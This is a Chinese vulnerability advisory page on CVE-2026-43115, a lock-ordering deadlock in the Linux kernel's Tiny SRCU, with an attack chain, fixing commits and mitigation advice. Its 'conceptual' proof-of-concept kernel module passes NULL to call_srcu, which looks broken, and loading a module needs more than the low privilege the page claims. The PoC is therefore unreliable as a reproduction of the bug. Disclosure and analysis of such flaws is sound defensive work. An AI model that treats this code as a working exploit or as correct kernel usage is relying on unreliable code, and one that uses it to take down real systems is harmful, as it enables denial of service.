IPBUF安全漏洞报告
English
CVE-2026-43115 CVSS 5.5 中危

CVE-2026-43115 Linux Kernel Tiny SRCU死锁漏洞

披露日期: 2026-05-06
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-43115
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux Kernel拒绝服务死锁DoS本地漏洞Race Condition

漏洞概述

Linux Kernel的Tiny SRCU组件存在安全漏洞。`srcu_gp_start_if_needed`直接调用`schedule_work`获取工作队列锁,与持有调度器锁的路径形成锁反转,可能导致系统死锁或拒绝服务。

技术细节

该漏洞源于Linux内核Tiny SRCU实现中的锁顺序不当。当`call_srcu()`持有`pi_lock`时调用`srcu_gp_start_if_needed()`,进而尝试获取`pool->lock`。反之,`workqueue_init()`持有`pool->lock`时调用`wake_up_process()`尝试获取`pi_lock`。这种反向的锁依赖会导致死锁或锁dep警告。修复方案引入`irq_work`作为中间层启动GP,避免直接持有锁时调用`schedule_work`,并在清理时增加同步以防止释放后使用。

攻击链分析

STEP 1
步骤1
攻击者获取本地低权限用户访问权限 (AV:L/PR:L)。
STEP 2
步骤2
攻击者执行特制的程序或内核模块,频繁调用Tiny SRCU相关的接口(如call_srcu)。
STEP 3
步骤3
在特定调度时刻,触发`pi_lock`与`pool->lock`的锁顺序反转。
STEP 4
步骤4
系统发生死锁或崩溃,导致拒绝服务 (A:H)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
/* * PoC for CVE-2026-43115 (Conceptual) * This kernel module attempts to trigger the race condition in Tiny SRCU. * Compile with: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/srcu.h> static struct srcu_struct srcu; static int __init poc_init(void) { printk(KERN_INFO "CVE-2026-43115 PoC: Loading module...\n"); init_srcu_struct(&srcu); // Attempt to trigger call_srcu() in a context that might stress the lock // Note: Triggering the specific deadlock requires precise timing/context. call_srcu(&srcu, NULL, NULL); return 0; } static void __exit poc_exit(void) { cleanup_srcu_struct(&srcu); printk(KERN_INFO "CVE-2026-43115 PoC: Unloading module...\n"); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL");

影响范围

Linux Kernel (Fixed by commit a6fc88b22bc8d12ad52e8412c667ec0f5bf055af)
Linux Kernel (Fixed by commit bb37286db65368cb72ba8757ad86299c4e4a73fc)

防御指南

临时缓解措施
由于该漏洞涉及内核锁机制,彻底缓解需要应用内核补丁。在无法立即升级的情况下,应严格限制本地代码执行权限,减少触发该竞态条件的可能性。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表